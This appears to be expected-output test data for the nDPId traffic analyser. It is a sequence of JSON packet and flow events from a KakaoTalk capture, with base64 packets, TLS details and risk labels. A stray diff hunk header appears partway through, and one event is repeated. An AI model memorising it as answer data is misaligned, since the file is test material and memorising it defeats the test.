00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":33,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1430069163715,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163715,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADzn5UAAPwb5gwoYUrxuTI8ygMgfkPcR2OkAAAAAoAI5CAV2AAACBAV4BAIICgALPwwAAAAAAQMDBw=="}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":34,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1430069163856,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069163856,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8H5CAyJJ42pD3EdjqoBI4kOpNAAACBAV4BAIICkTbaagACz8MAQMDCQ=="}
00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":35,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1430069163867,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069163867,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADTn5kAAPwb5igoYUrxuTI8ygMgfkPcR2OqSeNqRgBAAc1DtAAABAQgKAAs\/HETbaag="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":36,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069163715,"flow_last_seen":1430069163878,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069163878,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":38,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069163715,"flow_last_seen":1430069164107,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069164107,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":32968,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
00593{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164656,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"flow_min_l4_payload_len":442,"flow_max_l4_payload_len":442,"flow_tot_l4_payload_len":442,"flow_avg_l4_payload_len":442,"midstream":1,"thread_ts_msec":1430069164656,"l3_proto":"ip4","src_ip":"139.150.0.125","dst_ip":"10.24.82.188","src_port":443,"dst_port":46947,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
01060{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":46,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1430069164656,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":498,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":498,"pkt_l4_len":462,"thread_ts_msec":1430069164656,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAeIKLkAAjgb4AIuWAH0KGFK8Abu3Y2Ij1H9RKASKUBifhj2IAAC2AQAA7+nGaLVdqRc+Gkt7POZ3izYarM8cfC\/oKc57w3ON8GY\/K1szNYS+6Yytrgv9fJ110+svPWy4JXfqhqsy8n\/Qi0EhBo8vKa7TtIo39CMQrfI1DyAke3OCHinKUbcE7JofE08wNW\/SYiLVq+ch1jInTJlBtTETD6sakW5t+\/pqslJuJu6FErHiOcJlRXUhJ\/w2UMRtIuPzDgq66Pu7iQ4cPuLk01HGBYGyY\/ec8L+8kz8C0iE6HOIH6YT0BKGthN3UTgwPbBq6O4DQcUiN2hgrUDIxq8uw9ZbWllzKNEYrEa8k7r3ZVHoPDQdXWrcQvhxam6oeYyK7V8McoNRiSIayjOQMTgXnysBnscEyik7me1vByK2C0l2He7bBFWQmrSmeZXMFh2H60fcsxZbAlEWK0siSqlB7jvAlTaG4udBSGXSTj4rEL2MZLSGqP2XF68ncz4+WzMi\/pNklQw9YyvrinQJFb3QOjkMePALF9ilvEQ+wMia1\/U8MBwJo9G9KKjVSCXjRCZRheUcgsdenusXElIUwOqnMT+7rwPfeomV3b9fbsOdbRa7VkQEi4icvvEwgda+Sg6Qy"}
00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":47,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1430069164657,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069164657,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAACjTg0AAQAZ+ZQoYUryLlgB9t2MBu1EoBIpiI9Y5UBCiGOkBAAA="}
00517{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":50,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1430069164839,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":98,"pkt_l4_len":62,"thread_ts_msec":1430069164839,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAFLThEAAQAZ+OgoYUryLlgB9t2MBu1EoBIpiI9Y5UBiiGP3wAAAmAAAA7+nGaLVdqRc+Gkt7POZ3izYaHM4cfJ\/pKc5wznSY7XhZjDJkzsc="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069164966,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069164966,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":53,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":1,"flow_last_seen":1430069164966,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069164966,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxKlUAAQAaV1AoYUrxuTI8y5ekjKS1pjaoAAAAAoAI2sFqBAAACBAV4BAIICgACxz8AAAAAAQMDBQ=="}
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":54,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":2,"flow_last_seen":1430069165114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069165114,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADwAAEAALgbyaW5MjzIKGFK8Iynl6dfwna4taY2roBI4kADPAAACBAV4BAIICkTbbpQAAsc\/AQMDCQ=="}
00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":55,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_packet_id":3,"flow_last_seen":1430069165115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069165115,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADRKlkAAQAaV2woYUrxuTI8y5ekjKS1pjavX8J2vgBABtlp5AAABAQgKAALHTkTbbpQ="}
01065{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1430069164966,"flow_last_seen":1430069165129,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":35,"midstream":0,"thread_ts_msec":1430069165129,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}}},"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}}
01519{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":58,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1430069164966,"flow_last_seen":1430069165314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":852,"flow_tot_l4_payload_len":994,"flow_avg_l4_payload_len":165,"midstream":0,"thread_ts_msec":1430069165314,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"110.76.143.50","src_port":58857,"dst_port":9001,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"6": {"risk":"Self-signed Certificate","severity":"High","risk_score": {"total":500,"client":450,"server":50}},"7": {"risk":"Obsolete TLS Version (1.1 or older)","severity":"High","risk_score": {"total":510,"client":455,"server":55}},"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.KakaoTalk","breed":"Acceptable","category":"Chat"},"tls": {"version":"TLSv1","client_requested_server_name":"","ja3":"4b79ae67eb3b2cf1c75e68ea0100ca1b","ja3s":"4ea82b75038dd27e8a1cb69d8b839b26","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","issuerDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","subjectDN":"C=KR, L=Seoul, O=Kakao, CN=Kakao.com","fingerprint":"65:88:37:51:01:AA:1F:12:E4:44:27:52:F9:32:FD:40:94:C1:08:D9"}}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170090,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"flow_min_l4_payload_len":96,"flow_max_l4_payload_len":96,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":96,"midstream":1,"thread_ts_msec":1430069170090,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.194.72.188","src_port":34686,"dst_port":5228,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00607{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":1,"flow_last_seen":1430069170090,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":164,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":164,"pkt_l4_len":128,"thread_ts_msec":1430069170090,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAJSUaEAAQAZSqQoYUrytwki8h34UbGWkOWcyCtXvgBgB1zgmAAABAQgKAALJQHWhBxYXAwEAW9BJTUK7bhQDJS6M4k2xveYn3KZ2THpi3b2p1WnyM44nZ0651+YzJehbLb+jV4nNEd4GZbKLQU+P8abQYninXFhPSKcNuFppnDwsImxNyj3HrOvurwOWRZpYp3o="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","flow_datalink":113,"flow_max_packets":3}
00551{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":1,"flow_last_seen":1430069170892,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":122,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":122,"pkt_l4_len":86,"thread_ts_msec":1430069170892,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAGoAAEAAPxHbOAoYUrwByQGuLDlaBQBWgNSByQAHC4ZVGZBlh61hMGy+mVz7szeLE04wAIGpUs16HTnaFQo\/DwShnbgrVUo6QPfO7hnIEQI6Zble8vC3moejgAAAAXwPCk3m1v5lftk="}
00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":75,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069170892,"flow_last_seen":1430069170892,"flow_idle_time":180000,"flow_min_l4_payload_len":78,"flow_max_l4_payload_len":78,"flow_tot_l4_payload_len":78,"flow_avg_l4_payload_len":78,"midstream":0,"thread_ts_msec":1430069170892,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"1.201.1.174","src_port":11321,"dst_port":23045,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"KakaoTalk_Voice","breed":"Acceptable","category":"VoIP"}}
@@ -58,61 +58,61 @@
00583{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":130,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1430069171998,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069171998,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAPxHbJAoYUrwByQGuLDlaBQBqX6qByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="}
00581{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":134,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1430069172038,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172038,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAH4AAEAAQBHaJAoYUrwByQGuKB1aBwBqXmKByAAMVJql2trT+4JMtrXIu\/DNYLUyrcCH4nJIkwVlTlKbwLjRHdwKTf1t+cEG2dNtu5tj5fpNWxpJ1GyPSnYq1Tkhei6L7QH9KpD9dMR2BEbVSkSAAAACiCDm5WucO1eQLg=="}
00585{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":141,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1430069172127,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":142,"pkt_l4_len":106,"thread_ts_msec":1430069172127,"pkt":"AAACEgAAAAAAAAAAAAAIAEUoAH4AAEAAGhH\/\/AHJAa4KGFK8WgcoHQBqY8SByAAMC4ZVGUMDyNdZMqzZvFL5masXDZVA6JQCTSwYzII6r0J+H6ebHDpiG6\/AGpupgF2zzgl2ppSiLVPnYiD98U8UjOQ2fRfyw\/ugiovyQFT+lfaAAAACkQQ8eHVaWMSL\/A=="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1430069180329,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":83,"pkt_l4_len":47,"thread_ts_msec":1430069180329,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAAENCkkAAQAbmZQoYUrzYOtyuwEEBuxTXAEVlWZivUBiMAAFrAAAVAwEAFnnuS9reX0mqADPiihp3NglZFsDnKQA="}
00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069193291,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069193291,"l3_proto":"ip4","src_ip":"173.252.122.1","dst_ip":"10.24.82.188","src_port":443,"dst_port":52123,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1470,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1430069193291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069193291,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACg66EAAjgYtFq38egEKGFK8AbvLm\/Ii35zxwsMTUBSkcjKfAAA="}
00591{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069201833,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"flow_min_l4_payload_len":2,"flow_max_l4_payload_len":2,"flow_tot_l4_payload_len":2,"flow_avg_l4_payload_len":2,"midstream":1,"thread_ts_msec":1430069201833,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"203.205.151.233","src_port":53974,"dst_port":8080,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2099,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1430069201833,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069201833,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOw0AAQAYrdAoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtk1IAAABAQgKAALVpswmIb5QFA=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2182,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1430069202570,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069202570,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxEAAQAYrcwoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkz+AAABAQgKAALV8MwmIb5QFA=="}
00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2278,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1430069204049,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":70,"pkt_l4_len":34,"thread_ts_msec":1430069204049,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADZOxUAAQAYrcgoYUrzLzZfp0tYfkMl8NsazTa2QgBgBtkxqAAABAQgKAALWhMwmIb5QFA=="}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069210863,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069210863,"l3_proto":"ip4","src_ip":"173.194.117.229","dst_ip":"10.24.82.188","src_port":443,"dst_port":38380,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2798,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1430069210863,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069210863,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAACih+UAAjgbKWq3CdeUKGFK8AbuV7IoFQj5TpMuVUBSklweYAAA="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211505,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1430069211505,"l3_proto":"ip4","src_ip":"173.252.88.128","dst_ip":"10.24.82.188","src_port":443,"dst_port":59912,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2838,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":56,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":56,"pkt_l4_len":20,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAAChd+0AA+AbBg638WIAKGFK8AbvqCPsyGz7Wm7gkUBQAALuKAAA="}
00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2839,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":18,"flow_packet_id":2,"flow_last_seen":1430069211505,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":68,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":68,"pkt_l4_len":32,"thread_ts_msec":1430069211505,"pkt":"AAACEgAAAAAAAAAAAAAIAEUAADTK\/EAAjga+dq38WIAKGFK8AbvqCPsyGz7Wm7gkgBQClSKzAAABAQgKopRXsAACYuQ="}
00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069211639,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1430069211639,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"173.252.88.128","src_port":59954,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2851,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":19,"flow_packet_id":1,"flow_last_seen":1430069211639,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":76,"pkt_type":2048,"pkt_l3_offset":16,"pkt_l4_offset":36,"pkt_len":76,"pkt_l4_len":40,"thread_ts_msec":1430069211639,"pkt":"AAQCEgAAAAAAAAAAAAAIAEUAADxoAkAAQAZvaQoYUryt\/FiA6jIBuzJ1sXgAAAAAoAI2sGN\/AAACBAV4BAIICgAC2XoAAAAAAQMDBQ=="}
00592{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":691,"source":"KakaoTalk_talk.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1430069180329,"flow_last_seen":1430069180329,"flow_idle_time":7560000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":1,"thread_ts_msec":1430069180329,"l3_proto":"ip4","src_ip":"10.24.82.188","dst_ip":"216.58.220.174","src_port":49217,"dst_port":443,"l4_proto":"tcp","flow_datalink":113,"flow_max_packets":3}
